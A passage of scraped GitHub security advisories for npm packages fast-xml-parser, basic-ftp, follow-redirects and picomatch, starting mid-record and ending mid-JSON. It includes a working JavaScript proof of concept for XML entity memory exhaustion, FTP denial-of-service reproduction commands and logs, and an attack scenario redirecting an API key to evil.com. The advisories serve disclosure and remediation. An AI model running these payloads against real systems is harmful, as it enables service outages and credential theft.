this.options.maxEntityCount && // ← 0 is falsy, skips check
entityCount >= this.options.maxEntityCount) {
throw new Error(`Entity count ...`);
}
// src/xmlparser/DocTypeReader.js:128-130
if (this.options.enabled !== false &&
this.options.maxEntitySize && // ← 0 is falsy, skips check
entityValue.length > this.options.maxEntitySize) {
throw new Error(`Entity "${entityName}" size ...`);
}
The execution flow is:
- Developer configures
processEntities: { maxEntityCount: 0, maxEntitySize: 0 }intending to block all entity definitions. OptionsBuilder.normalizeProcessEntitiespreserves the0values via??(correct behavior).- Attacker supplies XML with a DOCTYPE containing many large entities.
DocTypeReader.readDocTypeevaluatesthis.options.maxEntityCount && ...— since0is falsy, the entire condition isfalse.DocTypeReader.readEntityExpevaluatesthis.options.maxEntitySize && ...— same result.- All entity count and size limits are bypassed; entities are parsed without restriction.
PoC
const { XMLParser } = require("fast-xml-parser");
// Developer intends: "no entities allowed at all"
const parser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 0, // should mean "zero entities allowed"
maxEntitySize: 0 // should mean "zero-length entities only"
}
});
// Generate XML with many large entities
let entities = "";
for (let i = 0; i < 1000; i++) {
entities += `<!ENTITY e${i} "${"A".repeat(100000)}">`;
}
const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
${entities}
]>
<foo>&e0;</foo>`;
// This should throw "Entity count exceeds maximum" but does not
try {
const result = parser.parse(xml);
console.log("VULNERABLE: parsed without error, entities bypassed limits");
} catch (e) {
console.log("SAFE:", e.message);
}
// Control test: setting maxEntityCount to 1 correctly blocks
const safeParser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 1,
maxEntitySize: 100
}
});
try {
safeParser.parse(xml);
console.log("ERROR: should have thrown");
} catch (e) {
console.log("CONTROL:", e.message); // "Entity count (2) exceeds maximum allowed (1)"
}
Expected output:
VULNERABLE: parsed without error, entities bypassed limits
CONTROL: Entity count (2) exceeds maximum allowed (1)
Impact
- Denial of Service: An attacker supplying crafted XML with thousands of large entity definitions can exhaust server memory in applications where the developer configured
maxEntityCount: 0ormaxEntitySize: 0, intending to prohibit entities entirely. - Security control bypass: Developers who explicitly set restrictive limits to
0receive no protection — the opposite of their intent. This creates a false sense of security. - Scope: Only applications that explicitly set these limits to
0are affected. The default configuration (maxEntityCount: 100,maxEntitySize: 10000) is not vulnerable. Theenabled: falseoption correctly disables entity processing entirely and is not affected.
Recommended Fix
Replace the truthy checks in DocTypeReader.js with explicit type checks that correctly treat 0 as a valid numeric limit:
// src/xmlparser/DocTypeReader.js:30-32 — replace:
if (this.options.enabled !== false &&
this.options.maxEntityCount &&
entityCount >= this.options.maxEntityCount) {
// with:
if (this.options.enabled !== false &&
typeof this.options.maxEntityCount === 'number' &&
entityCount >= this.options.maxEntityCount) {
// src/xmlparser/DocTypeReader.js:128-130 — replace:
if (this.options.enabled !== false &&
this.options.maxEntitySize &&
entityValue.length > this.options.maxEntitySize) {
// with:
if (this.options.enabled !== false &&
typeof this.options.maxEntitySize === 'number' &&
entityValue.length > this.options.maxEntitySize) {
Workaround
If you don't want to processed the entities, keep the processEntities flag to false instead of setting any limit to 0.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-beta.3"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.5.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33349"
],
"database_specific": {
"cwe_ids": [
"CWE-1284"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T19:13:13Z",
"nvd_published_at": "2026-03-24T20:16:29Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `DocTypeReader` in fast-xml-parser uses JavaScript truthy checks to evaluate `maxEntityCount` and `maxEntitySize` configuration limits. When a developer explicitly sets either limit to `0` \u2014 intending to disallow all entities or restrict entity size to zero bytes \u2014 the falsy nature of `0` in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service.\n\n## Details\n\nThe `OptionsBuilder.js` correctly preserves a user-supplied value of `0` using nullish coalescing (`??`):\n\n```js\n// src/xmlparser/OptionsBuilder.js:111\nmaxEntityCount: value.maxEntityCount ?? 100,\n// src/xmlparser/OptionsBuilder.js:107\nmaxEntitySize: value.maxEntitySize ?? 10000,\n```\n\nHowever, `DocTypeReader.js` uses truthy evaluation to check these limits. Because `0` is falsy in JavaScript, the entire guard expression short-circuits to `false`, and the limit is never enforced:\n\n```js\n// src/xmlparser/DocTypeReader.js:30-32\nif (this.options.enabled !== false \u0026\u0026\n this.options.maxEntityCount \u0026\u0026 // \u2190 0 is falsy, skips check\n entityCount \u003e= this.options.maxEntityCount) {\n throw new Error(`Entity count ...`);\n}\n```\n\n```js\n// src/xmlparser/DocTypeReader.js:128-130\nif (this.options.enabled !== false \u0026\u0026\n this.options.maxEntitySize \u0026\u0026 // \u2190 0 is falsy, skips check\n entityValue.length \u003e this.options.maxEntitySize) {\n throw new Error(`Entity \"${entityName}\" size ...`);\n}\n```\n\nThe execution flow is:\n\n1. Developer configures `processEntities: { maxEntityCount: 0, maxEntitySize: 0 }` intending to block all entity definitions.\n2. `OptionsBuilder.normalizeProcessEntities` preserves the `0` values via `??` (correct behavior).\n3. Attacker supplies XML with a DOCTYPE containing many large entities.\n4. `DocTypeReader.readDocType` evaluates `this.options.maxEntityCount \u0026\u0026 ...` \u2014 since `0` is falsy, the entire condition is `false`.\n5. `DocTypeReader.readEntityExp` evaluates `this.options.maxEntitySize \u0026\u0026 ...` \u2014 same result.\n6. All entity count and size limits are bypassed; entities are parsed without restriction.\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\n// Developer intends: \"no entities allowed at all\"\nconst parser = new XMLParser({\n processEntities: {\n enabled: true,\n maxEntityCount: 0, // should mean \"zero entities allowed\"\n maxEntitySize: 0 // should mean \"zero-length entities only\"\n }\n});\n\n// Generate XML with many large entities\nlet entities = \"\";\nfor (let i = 0; i \u003c 1000; i++) {\n entities += `\u003c!ENTITY e${i} \"${\"A\".repeat(100000)}\"\u003e`;\n}\n\nconst xml = `\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE foo [\n ${entities}\n]\u003e\n\u003cfoo\u003e\u0026e0;\u003c/foo\u003e`;\n\n// This should throw \"Entity count exceeds maximum\" but does not\ntry {\n const result = parser.parse(xml);\n console.log(\"VULNERABLE: parsed without error, entities bypassed limits\");\n} catch (e) {\n console.log(\"SAFE:\", e.message);\n}\n\n// Control test: setting maxEntityCount to 1 correctly blocks\nconst safeParser = new XMLParser({\n processEntities: {\n enabled: true,\n maxEntityCount: 1,\n maxEntitySize: 100\n }\n});\n\ntry {\n safeParser.parse(xml);\n console.log(\"ERROR: should have thrown\");\n} catch (e) {\n console.log(\"CONTROL:\", e.message); // \"Entity count (2) exceeds maximum allowed (1)\"\n}\n```\n\n**Expected output:**\n```\nVULNERABLE: parsed without error, entities bypassed limits\nCONTROL: Entity count (2) exceeds maximum allowed (1)\n```\n\n## Impact\n\n- **Denial of Service:** An attacker supplying crafted XML with thousands of large entity definitions can exhaust server memory in applications where the developer configured `maxEntityCount: 0` or `maxEntitySize: 0`, intending to prohibit entities entirely.\n- **Security control bypass:** Developers who explicitly set restrictive limits to `0` receive no protection \u2014 the opposite of their intent. This creates a false sense of security.\n- **Scope:** Only applications that explicitly set these limits to `0` are affected. The default configuration (`maxEntityCount: 100`, `maxEntitySize: 10000`) is not vulnerable. The `enabled: false` option correctly disables entity processing entirely and is not affected.\n\n## Recommended Fix\n\nReplace the truthy checks in `DocTypeReader.js` with explicit type checks that correctly treat `0` as a valid numeric limit:\n\n```js\n// src/xmlparser/DocTypeReader.js:30-32 \u2014 replace:\nif (this.options.enabled !== false \u0026\u0026\n this.options.maxEntityCount \u0026\u0026\n entityCount \u003e= this.options.maxEntityCount) {\n\n// with:\nif (this.options.enabled !== false \u0026\u0026\n typeof this.options.maxEntityCount === \u0027number\u0027 \u0026\u0026\n entityCount \u003e= this.options.maxEntityCount) {\n```\n\n```js\n// src/xmlparser/DocTypeReader.js:128-130 \u2014 replace:\nif (this.options.enabled !== false \u0026\u0026\n this.options.maxEntitySize \u0026\u0026\n entityValue.length \u003e this.options.maxEntitySize) {\n\n// with:\nif (this.options.enabled !== false \u0026\u0026\n typeof this.options.maxEntitySize === \u0027number\u0027 \u0026\u0026\n entityValue.length \u003e this.options.maxEntitySize) {\n```\n\n# Workaround\n\nIf you don\u0027t want to processed the entities, keep the processEntities flag to false instead of setting any limit to 0.",
"id": "GHSA-jp2q-39xq-3w4g",
"modified": "2026-04-08T22:27:44Z",
"published": "2026-03-19T19:13:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33349"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221"
},
{
"type": "PACKAGE",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Entity Expansion Limits Bypassed When Set to Zero Due to JavaScript Falsy Evaluation in fast-xml-parser"
}
GHSA-RPMF-866Q-6P89
Vulnerability from github – Published: 2026-05-06 19:37 – Updated: 2026-05-13 16:29Summary
basic-ftp is vulnerable to client-side denial of service when parsing FTP control-channel multiline responses.
A malicious or compromised FTP server can send an unterminated multiline response during the initial FTP banner phase, before authentication. The client keeps appending attacker-controlled data into FtpContext._partialResponse and repeatedly reparses the accumulated buffer without enforcing a maximum control response size.
As a result, an application using basic-ftp can remain stuck in connect() while memory and CPU usage grow under attacker-controlled input. This can lead to process-level denial of service, container OOM kills, worker restarts, queue backlog, or service degradation in applications that automatically connect to FTP endpoints.
Details
Root cause
The root cause is that incomplete FTP multiline control responses are buffered without an upper bound.
FtpContext stores incomplete control-channel data in _partialResponse:
https://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/FtpContext.ts#L63-L64
Incoming control-channel data is handled in _onControlSocketData. The implementation concatenates the previous incomplete response with the new chunk, parses the entire accumulated string, and stores parsed.rest back into _partialResponse:
https://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/FtpContext.ts#L328-L340
The relevant flow is:
completeResponse = this._partialResponse + chunk parsed = parseControlResponse(completeResponse) this._partialResponse = parsed.rest
There is no maximum size check before concatenating, before parsing, or before storing parsed.rest.
The parser accepts incomplete multiline responses and returns the entire unterminated multiline group as rest:
https://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/parseControlResponse.ts#L15-L43
If a server starts a multiline FTP response:
220-malicious banner starts
but never sends the terminating line:
220 ready
then parseControlResponse() treats the accumulated multiline data as incomplete and returns it as rest.
Because _onControlSocketData() feeds _partialResponse + chunk back into the parser on every new data event, the client repeatedly reparses a growing attacker-controlled buffer. This creates both memory growth and increasing parsing work.
Why this is security-relevant
The vulnerable component is a client library. The attacker does not need to authenticate to the victim system and does not need valid FTP credentials.
The attack occurs automatically when an application using basic-ftp connects to a malicious or compromised FTP server. The malicious response is sent as the FTP server banner before login. No additional user interaction is required after the application initiates a normal FTP connection.
This is realistic for applications that use FTP for:
- scheduled imports or exports
- customer-provided FTP endpoints
- backup or synchronization jobs
- CI/CD artifact mirroring
- document ingestion pipelines
- legacy business integrations
In those environments, one malicious or compromised FTP endpoint can cause the Node.js process using basic-ftp to consume excessive memory and CPU or remain stuck in a pending connection state.
Proof of Concept
The PoC uses a local malicious FTP server that accepts a victim connection and sends an unterminated multiline FTP banner. The banner starts with 220-, but the server never sends the required terminating 220 line.
Reproduction steps
From the root of the basic-ftp project:
npm ci
npm run buildOnly
CHUNKS=1000 node poc_control_parser_direct.js | tee poc-results/parser_direct_1000.log
Run the end-to-end malicious FTP server PoC:
CHUNK_SIZE=8192 CHUNKS=1000 DELAY_MS=1 node poc_control_multiline_dos.js | tee poc-results/control_multiline_dos_1000.log
control_multiline_dos_1000.log
Observed result: parser-only PoC
[basic-ftp parseControlResponse incomplete multiline DoS]
Input fed: 7.81 MiB
Retained rest: 7.81 MiB
Initial rss/heap: 54.77 MiB 3.69 MiB
Final rss/heap: 141.64 MiB 80.77 MiB
This shows that parseControlResponse() retained the full unterminated multiline response as rest.
The retained buffer grew to 7.81 MiB. Heap usage increased from 3.69 MiB to 80.77 MiB, and RSS increased from 54.77 MiB to 141.64 MiB.
Observed result: end-to-end malicious FTP server PoC
[server] listening on 127.0.0.1:34429
[server] victim connected
[progress] chunks=850 sent=6.6 MiB partialResponse=6.6 MiB heapUsed=227.5 MiB rss=292.4 MiB
[progress] chunks=900 sent=7.0 MiB partialResponse=7.0 MiB heapUsed=213.1 MiB rss=278.0 MiB
[final-before-close] chunks=1000 sent=7.8 MiB partialResponse=7.8 MiB heapUsed=82.1 MiB rss=146.8 MiB
[result] client connect() is still pending because the multiline response never terminated
Only 7.8 MiB of malicious control-channel data was sent. The client retained 7.8 MiB in _partialResponse, showed large memory spikes, and remained pending inside connect() because the multiline response was never terminated.
Expected behavior
The client should enforce a maximum size for incomplete FTP control responses. If the accumulated multiline response exceeds a safe limit, the client should close the connection and reject the active task with an error.
The client should not allow a remote FTP server to make _partialResponse grow without bound.
Actual behavior
A malicious FTP server can keep the client in a pending connection state by sending an unterminated multiline control response. basic-ftp continues buffering and reparsing the accumulated data without a maximum response size.
Impact
A malicious or compromised FTP server can cause denial of service in applications using basic-ftp.
Possible real-world impact includes:
- Node.js process memory exhaustion
- container OOM kill
- worker crash or restart loop
- event loop CPU pressure due to repeated reparsing
- stuck FTP jobs
- queue backlog in scheduled import/export systems
- degraded availability of services relying on automated FTP ingestion
Threat model
The attacker controls, compromises, or can impersonate an FTP server that a victim application connects to.
Examples:
- A SaaS application allows customers to configure external FTP endpoints for automated imports.
- A backend job periodically pulls files from partner FTP servers.
- A document ingestion pipeline connects to FTP endpoints supplied by external users.
- A legacy integration uses FTP for scheduled synchronization.
- A build or deployment pipeline mirrors artifacts from an FTP server.
In each case, the victim application initiates a normal FTP connection. The malicious server sends an unterminated multiline banner before authentication. The vulnerable client then buffers and reparses the response indefinitely.
No FTP credentials are required for exploitation because the attack happens before login.
Suggested fix
Introduce a maximum control response buffer size, especially for incomplete multiline responses.
Recommended changes:
- Add a
maxControlResponseBytesormaxControlResponseLengthlimit. - Enforce the limit before or immediately after appending new control-channel data.
- Close the connection and reject the active task when the limit is exceeded.
- Add regression tests for unterminated multiline responses.
Example defensive logic:
if (completeResponse.length > maxControlResponseLength) {
closeWithError(new Error("FTP control response exceeded maximum allowed size"))
}
A regression test should verify that a response beginning with 220- and never terminating with 220 is rejected after the configured size limit instead of being retained indefinitely.
Suggested regression test scenario
A test server should:
- Accept a client connection.
- Send an FTP multiline response opener such as
220-malicious banner\r\n. - Continue sending additional lines without ever sending the terminating
220line. - Verify that the client rejects the connection once the configured response-size limit is exceeded.
- Verify that
_partialResponsedoes not grow without bound.
Credit request
If you publish an advisory or assign a CVE, please credit me as:
Ali Firas (thesmartshadow) - https://www.smartshadow.dev
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.3.0"
},
"package": {
"ecosystem": "npm",
"name": "basic-ftp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44240"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T19:37:33Z",
"nvd_published_at": "2026-05-12T21:16:16Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`basic-ftp` is vulnerable to client-side denial of service when parsing FTP control-channel multiline responses.\n\nA malicious or compromised FTP server can send an unterminated multiline response during the initial FTP banner phase, before authentication. The client keeps appending attacker-controlled data into `FtpContext._partialResponse` and repeatedly reparses the accumulated buffer without enforcing a maximum control response size.\n\nAs a result, an application using `basic-ftp` can remain stuck in `connect()` while memory and CPU usage grow under attacker-controlled input. This can lead to process-level denial of service, container OOM kills, worker restarts, queue backlog, or service degradation in applications that automatically connect to FTP endpoints.\n\n---\n\n## Details\n\n### Root cause\n\nThe root cause is that incomplete FTP multiline control responses are buffered without an upper bound.\n\n`FtpContext` stores incomplete control-channel data in `_partialResponse`:\n\n\nhttps://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/FtpContext.ts#L63-L64\n\n\nIncoming control-channel data is handled in `_onControlSocketData`. The implementation concatenates the previous incomplete response with the new chunk, parses the entire accumulated string, and stores `parsed.rest` back into `_partialResponse`:\n\n\nhttps://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/FtpContext.ts#L328-L340\n\n\nThe relevant flow is:\n\n\ncompleteResponse = this._partialResponse + chunk\nparsed = parseControlResponse(completeResponse)\nthis._partialResponse = parsed.rest\n\n\nThere is no maximum size check before concatenating, before parsing, or before storing `parsed.rest`.\n\nThe parser accepts incomplete multiline responses and returns the entire unterminated multiline group as `rest`:\n\n\nhttps://github.com/patrickjuchli/basic-ftp/blob/50827c73ca6c1d786c97276e47be8a33d0f2277d/src/parseControlResponse.ts#L15-L43\n\n\nIf a server starts a multiline FTP response:\n\n\n220-malicious banner starts\n\n\nbut never sends the terminating line:\n\n\n220 ready\n\n\nthen `parseControlResponse()` treats the accumulated multiline data as incomplete and returns it as `rest`.\n\nBecause `_onControlSocketData()` feeds `_partialResponse + chunk` back into the parser on every new data event, the client repeatedly reparses a growing attacker-controlled buffer. This creates both memory growth and increasing parsing work.\n\n### Why this is security-relevant\n\nThe vulnerable component is a client library. The attacker does not need to authenticate to the victim system and does not need valid FTP credentials.\n\nThe attack occurs automatically when an application using `basic-ftp` connects to a malicious or compromised FTP server. The malicious response is sent as the FTP server banner before login. No additional user interaction is required after the application initiates a normal FTP connection.\n\nThis is realistic for applications that use FTP for:\n\n- scheduled imports or exports\n- customer-provided FTP endpoints\n- backup or synchronization jobs\n- CI/CD artifact mirroring\n- document ingestion pipelines\n- legacy business integrations\n\nIn those environments, one malicious or compromised FTP endpoint can cause the Node.js process using `basic-ftp` to consume excessive memory and CPU or remain stuck in a pending connection state.\n\n---\n\n## Proof of Concept\n\nThe PoC uses a local malicious FTP server that accepts a victim connection and sends an unterminated multiline FTP banner. The banner starts with `220-`, but the server never sends the required terminating `220 ` line.\n\n### Reproduction steps\n\nFrom the root of the `basic-ftp` project:\n\n```bash\nnpm ci\nnpm run buildOnly\n```\n\n[poc_control_parser_direct.js](https://github.com/user-attachments/files/27051425/poc_control_parser_direct.js)\n\n```bash\nCHUNKS=1000 node poc_control_parser_direct.js | tee poc-results/parser_direct_1000.log\n```\n\n[parser_direct_1000.log](https://github.com/user-attachments/files/27051430/parser_direct_1000.log)\n\nRun the end-to-end malicious FTP server PoC:\n\n[poc_control_multiline_dos.js](https://github.com/user-attachments/files/27051385/poc_control_multiline_dos.js)\n\n```bash\nCHUNK_SIZE=8192 CHUNKS=1000 DELAY_MS=1 node poc_control_multiline_dos.js | tee poc-results/control_multiline_dos_1000.log\n```\n\n[control_multiline_dos_1000.log](https://github.com/user-attachments/files/27051397/control_multiline_dos_1000.log)\n\n### Observed result: parser-only PoC\n\n```text\n[basic-ftp parseControlResponse incomplete multiline DoS]\nInput fed: 7.81 MiB\nRetained rest: 7.81 MiB\nInitial rss/heap: 54.77 MiB 3.69 MiB\nFinal rss/heap: 141.64 MiB 80.77 MiB\n```\n\nThis shows that `parseControlResponse()` retained the full unterminated multiline response as `rest`.\n\nThe retained buffer grew to `7.81 MiB`. Heap usage increased from `3.69 MiB` to `80.77 MiB`, and RSS increased from `54.77 MiB` to `141.64 MiB`.\n\n### Observed result: end-to-end malicious FTP server PoC\n\n```text\n[server] listening on 127.0.0.1:34429\n[server] victim connected\n[progress] chunks=850 sent=6.6 MiB partialResponse=6.6 MiB heapUsed=227.5 MiB rss=292.4 MiB\n[progress] chunks=900 sent=7.0 MiB partialResponse=7.0 MiB heapUsed=213.1 MiB rss=278.0 MiB\n[final-before-close] chunks=1000 sent=7.8 MiB partialResponse=7.8 MiB heapUsed=82.1 MiB rss=146.8 MiB\n[result] client connect() is still pending because the multiline response never terminated\n```\n\nOnly `7.8 MiB` of malicious control-channel data was sent. The client retained `7.8 MiB` in `_partialResponse`, showed large memory spikes, and remained pending inside `connect()` because the multiline response was never terminated.\n\n---\n\n## Expected behavior\n\nThe client should enforce a maximum size for incomplete FTP control responses. If the accumulated multiline response exceeds a safe limit, the client should close the connection and reject the active task with an error.\n\nThe client should not allow a remote FTP server to make `_partialResponse` grow without bound.\n\n---\n\n## Actual behavior\n\nA malicious FTP server can keep the client in a pending connection state by sending an unterminated multiline control response. `basic-ftp` continues buffering and reparsing the accumulated data without a maximum response size.\n\n---\n\n## Impact\n\nA malicious or compromised FTP server can cause denial of service in applications using `basic-ftp`.\n\nPossible real-world impact includes:\n\n- Node.js process memory exhaustion\n- container OOM kill\n- worker crash or restart loop\n- event loop CPU pressure due to repeated reparsing\n- stuck FTP jobs\n- queue backlog in scheduled import/export systems\n- degraded availability of services relying on automated FTP ingestion\n\n---\n\n## Threat model\n\nThe attacker controls, compromises, or can impersonate an FTP server that a victim application connects to.\n\nExamples:\n\n1. A SaaS application allows customers to configure external FTP endpoints for automated imports.\n2. A backend job periodically pulls files from partner FTP servers.\n3. A document ingestion pipeline connects to FTP endpoints supplied by external users.\n4. A legacy integration uses FTP for scheduled synchronization.\n5. A build or deployment pipeline mirrors artifacts from an FTP server.\n\nIn each case, the victim application initiates a normal FTP connection. The malicious server sends an unterminated multiline banner before authentication. The vulnerable client then buffers and reparses the response indefinitely.\n\nNo FTP credentials are required for exploitation because the attack happens before login.\n\n---\n\n## Suggested fix\n\nIntroduce a maximum control response buffer size, especially for incomplete multiline responses.\n\nRecommended changes:\n\n- Add a `maxControlResponseBytes` or `maxControlResponseLength` limit.\n- Enforce the limit before or immediately after appending new control-channel data.\n- Close the connection and reject the active task when the limit is exceeded.\n- Add regression tests for unterminated multiline responses.\n\nExample defensive logic:\n\n```text\nif (completeResponse.length \u003e maxControlResponseLength) {\n closeWithError(new Error(\"FTP control response exceeded maximum allowed size\"))\n}\n```\n\nA regression test should verify that a response beginning with `220-` and never terminating with `220 ` is rejected after the configured size limit instead of being retained indefinitely.\n\n---\n\n## Suggested regression test scenario\n\nA test server should:\n\n1. Accept a client connection.\n2. Send an FTP multiline response opener such as `220-malicious banner\\r\\n`.\n3. Continue sending additional lines without ever sending the terminating `220 ` line.\n4. Verify that the client rejects the connection once the configured response-size limit is exceeded.\n5. Verify that `_partialResponse` does not grow without bound.\n\n## Credit request\nIf you publish an advisory or assign a CVE, please credit me as:\n\nAli Firas (thesmartshadow) - https://www.smartshadow.dev",
"id": "GHSA-rpmf-866q-6p89",
"modified": "2026-05-13T16:29:59Z",
"published": "2026-05-06T19:37:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-rpmf-866q-6p89"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44240"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickjuchli/basic-ftp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering"
}
GHSA-R4Q5-VMMM-2653
Vulnerability from github – Published: 2026-04-14 01:11 – Updated: 2026-04-14 01:11Summary
When an HTTP request follows a cross-domain redirect (301/302/307/308), follow-redirects only strips authorization, proxy-authorization, and cookie headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., X-API-Key, X-Auth-Token, Api-Key, Token) is forwarded verbatim to the redirect target.
Since follow-redirects is the redirect-handling dependency for axios (105K+ stars), this vulnerability affects the entire axios ecosystem.
Affected Code
index.js, lines 469-476:
if (redirectUrl.protocol !== currentUrlParts.protocol &&
redirectUrl.protocol !== "https:" ||
redirectUrl.host !== currentHost &&
!isSubdomain(redirectUrl.host, currentHost)) {
removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);
}
The regex only matches authorization, proxy-authorization, and cookie. Custom headers like X-API-Key are not matched.
Attack Scenario
- App uses axios with custom auth header:
headers: { 'X-API-Key': 'sk-live-secret123' } - Server returns
302 Location: https://evil.com/steal - follow-redirects sends
X-API-Key: sk-live-secret123toevil.com - Attacker captures the API key
Impact
Any custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.
Suggested Fix
Add a sensitiveHeaders option that users can extend, or strip ALL non-standard headers on cross-domain redirect.
Disclosure
Source code review, manually verified. Found 2026-03-20.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.15.11"
},
"package": {
"ecosystem": "npm",
"name": "follow-redirects"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.16.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T01:11:11Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol \u0026\u0026\n redirectUrl.protocol !== \"https:\" ||\n redirectUrl.host !== currentHost \u0026\u0026\n !isSubdomain(redirectUrl.host, currentHost)) {\n removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { \u0027X-API-Key\u0027: \u0027sk-live-secret123\u0027 }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.",
"id": "GHSA-r4q5-vmmm-2653",
"modified": "2026-04-14T01:11:11Z",
"published": "2026-04-14T01:11:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9"
},
{
"type": "PACKAGE",
"url": "https://github.com/follow-redirects/follow-redirects"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets"
}
GHSA-3V7F-55P6-F55P
Vulnerability from github – Published: 2026-03-25 21:13 – Updated: 2026-03-27 21:36Impact
picomatch is vulnerable to a method injection vulnerability (CWE-1321) affecting the POSIX_REGEX_SOURCE object. Because the object inherits from Object.prototype, specially crafted POSIX bracket expressions (e.g., [[:constructor:]]) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.
This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.
All users of affected picomatch versions that process untrusted or user-controlled glob patterns are potentially impacted.
Patches
This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.
Users should upgrade to one of these versions or later, depending on their supported release line.
Workarounds
If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.
Possible mitigations include:
- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like [[:...:]].
- Avoiding the use of POSIX bracket expressions if user input is involved.
- Manually patching the library by modifying POSIX_REGEX_SOURCE to use a null prototype:
```js const POSIX_REGEX_SOURCE = { proto: null, alnum: 'a-zA-Z0-9', alpha: 'a-zA-Z', // ... rest unchanged };
Resources
- fix for similar issue: https://github.com/micromatch/picomatch/pull/144
- picomatch repository https://github.com/micromatch/picomatch
{
"affected": [
{
